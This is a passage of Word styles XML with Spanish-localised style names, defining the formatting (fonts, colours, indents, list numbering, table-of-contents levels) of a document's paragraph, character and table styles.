  <w:style w:type="character" w:styleId="Fuerte">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hashtag">
    <w:name w:val="Hashtag"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="2B579A"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculointeligente">
    <w:name w:val="Smart Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:u w:val="dotted"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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71ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="440" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice3">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="660" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice4">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="880" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice5">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1100" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice6">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1320" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1540" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1760" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ndice9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1980" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista">
    <w:name w:val="List"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="360" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1080" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista4">
    <w:name w:val="List 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1440" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lista5">
    <w:name w:val="List 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="1800" w:hanging="360"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Listaclara">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="61"/>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uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="10"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconnmeros2">
    <w:name w:val="List Number 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconnmeros3">
    <w:name w:val="List Number 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconnmeros4">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="13"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconnmeros5">
    <w:name w:val="List Number 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="14"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="16"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas3">
    <w:name w:val="List Bullet 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="17"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas4">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="18"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Listaconvietas5">
    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="19"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Listamedia1">
    <w:name w:val="Medium List 1"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="65"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771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A771E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A771E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A771E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A771E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A771E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A771E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A771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A771E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A771E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A771E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A771E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A771E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A771E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A771ED"/>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771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="MquinadeescribirHTML">
    <w:name w:val="HTML Typewriter"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencionar">
    <w:name w:val="Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="2B579A"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Nmerodelnea">
    <w:name w:val="line number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="Nmerodepgina">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Refdecomentario">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Refdenotaalfinal">
    <w:name w:val="endnote reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Refdenotaalpie">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Referenciaintensa">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Referenciasutil">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Remitedesobre">
    <w:name w:val="envelope return"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>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771ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SaludoCar">
    <w:name w:val="Saludo Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Saludo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangra2detindependiente">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Sangra2detindependienteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangra3detindependiente">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Sangra3detindependienteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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A771ED"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangradetextonormal">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SangradetextonormalCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SangradetextonormalCar">
    <w:name w:val="Sangría de texto normal Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Sangradetextonormal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sangranormal">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sinespaciado">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="SmartLink">
    <w:name w:val="Smart Link"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F3F2F1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Sombreadoclaro">
    <w:name w:val="Light Shading"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="60"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771E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A771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A771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A771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A771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A771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A771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A771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A771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A771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A771E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771E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A771E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771E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A771E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771E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A771E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A771E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A771E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A771E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A771E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A771ED"/>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A771E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A771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A771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A771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A771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A771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A771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A771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A771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A771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A771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A771E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A771ED"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tabladelista1clara">
    <w:name w:val="List Table 1 Light"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00A771E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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771E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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771E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A771ED"/>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A771E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A771E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A771E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A771E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A771ED"/>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A771E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A771ED"/>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A771E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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771E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A771E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A771E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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771ED"/>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A771E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A771E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A771E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A771ED"/>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A771ED"/>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A771E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771E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A771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A771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A771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771E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A771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771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A771E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A771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A771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A771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A771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A771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A771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A771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A771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unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="880"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1540"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="TecladoHTML">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoconsangra">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:ind w:left="220" w:hanging="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodebloque">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771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globo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextodegloboCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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71ED"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textodelmarcadordeposicin">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextoindependienteCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextoindependienteCar">
    <w:name w:val="Texto independiente Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textoindependiente"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Textoindependiente2Car"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771ED"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Textoindependiente2Car">
    <w:name w:val="Texto independiente 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Textoindependiente2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependiente3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Textoindependiente3Car"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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771ED"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependienteprimerasangra">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="Textoindependiente"/>
    <w:link w:val="TextoindependienteprimerasangraCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A771E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771ED"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textoindependienteprimerasangra2">
    <w:name w:val="Body Text First Indent 2"/>
    <w:basedOn w:val="Sangradetextonormal"/>
